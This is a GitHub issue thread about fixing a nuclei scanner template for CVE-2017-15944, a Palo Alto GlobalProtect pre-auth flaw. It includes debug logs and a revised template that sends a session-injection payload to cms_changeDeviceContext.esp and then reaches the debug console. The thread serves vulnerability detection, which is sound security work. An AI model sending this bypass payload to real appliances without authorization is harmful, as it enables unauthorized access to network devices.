### ISSUE TITLE
[Bug] CVE-2017-15944

### ISSUE THREAD

**Issue by milo2012** [projectdiscovery/nuclei-templates#1990]
**Describe the bug**
The CVE-2017-15944.yaml template is not working properly.  On one of my checks, the /global-protect/portal/css/login.css file was not present on the target but the host was vulnerable.

**Commands to reproduce**
Original template
```
% nuclei -t CVE-2017-15944.yaml -l /tmp/websites.hosts -debug -timeout 20                                 
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Loading templates...
[INF] [CVE-2017-15944] PreAuth RCE on Palo Alto GlobalProtect (@emadshanab) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[INF] [CVE-2017-15944] Dumped HTTP request for https://192.168.1.1

GET /global-protect/portal/css/login.css HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[INF] [CVE-2017-15944] Dumped HTTP response for https://192.168.1.1/global-protect/portal/css/login.css

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 211
Content-Type: text/css
Date: Wed, 14 Jul 2021 06:45:40 GMT
Server: 

<!DOCTYPE html>
<html><head><title>Document Error: Not Found</title></head>
<body><h2>Access Error: 404 -- Not Found</h2>
<p>Can't locate document: /global-protect/portal/css/login.css</p>
</body>
</html>
[INF] No results found. Better luck next time!
```

Modified Template
```
% nuclei -t CVE-2017-15944.yaml -l /tmp/websites.hosts -debug -timeout 20
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Loading templates...
[INF] [CVE-2017-15944] PreAuth RCE on Palo Alto GlobalProtect (@emadshanab) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[INF] [CVE-2017-15944] Dumped HTTP request for https://192.168.1.1

GET /php/utils/debug.php HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Cookie: PHPSESSID=hacked1;
Accept-Encoding: gzip

[INF] [CVE-2017-15944] Dumped HTTP response for https://192.168.1.1/php/utils/debug.php

HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 280
Date: Wed, 14 Jul 2021 06:52:50 GMT
Etag: "4b4ac-1d5c-56e9b91e"
Location: https://192.168.1.1:443/php/logout.php
Server: 

<!DOCTYPE html>
<html><head><title>Moved Temporarily</title></head>
<body><h1>Moved Temporarily</h1>
<p>The document has moved <a href="http://192.168.1.1:28250/php/logout.php">here</a>.</p>
<address>PanWeb Server/ -  at 127.0.0.1:28250 Port 80</address></body>
</html>
[INF] [CVE-2017-15944] Dumped HTTP request for https://192.168.1.1

GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Cookie: PHPSESSID=hacked1;
Accept-Encoding: gzip

[INF] [CVE-2017-15944] Dumped HTTP response for https://192.168.1.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Content-Type: text/plain; charset=UTF-8
Date: Wed, 14 Jul 2021 06:52:55 GMT
Etag: "43949-288-593f81bf"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: private
Server: 
Set-Cookie: _appwebSessionId_=hacked1;path=/;secure;
Set-Cookie: PHPSESSID=hacked1;path=/;secure;
X-Frame-Options: SAMEORIGIN

@start@Success@end@
[INF] [CVE-2017-15944] Dumped HTTP request for https://192.168.1.1

GET /php/utils/debug.php HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Cookie: PHPSESSID=hacked1;
Accept-Encoding: gzip

[INF] [CVE-2017-15944] Dumped HTTP response for https://192.168.1.1/php/utils/debug.php

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Wed, 14 Jul 2021 06:56:27 GMT
Etag: "4b4ac-1d5c-56e9b91e"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: 
X-Frame-Options: SAMEORIGIN

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <title>Debug Console</title>
[...snip...]
</html>
[2021-07-14 14:56:45] [CVE-2017-15944] [http] [high] https://192.168.1.1/php/utils/debug.php
```

I have attached the updated template for your review
[CVE-2017-15944.txt](https://github.com/projectdiscovery/nuclei-templates/files/6814111/CVE-2017-15944.txt)

**Comment by ehsandeep** [comment]
@milo2012 thank you for the update, do you think the 1st request is necessary or below example works fine?

```yaml
requests:
  - raw:
    - |
      GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
      Host: {{Hostname}}
      Cookie: PHPSESSID={{randstr}};

    - |
      GET /php/utils/debug.php HTTP/1.1
      Host: {{Hostname}}
      Cookie: PHPSESSID={{randstr}};
```

**Comment by milo2012** [comment]
Hi

We are reduce the template to just the below requests. Thank you for your help.
I tried it on a couple of vulnerable versions. Thanks

```
requests:
  - raw:
    - |
      GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
      Host: {{Hostname}}
      Cookie: PHPSESSID=hacked;

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "@start@Success@end@"
        part: body  

      - type: status
        status:
          - 200
```
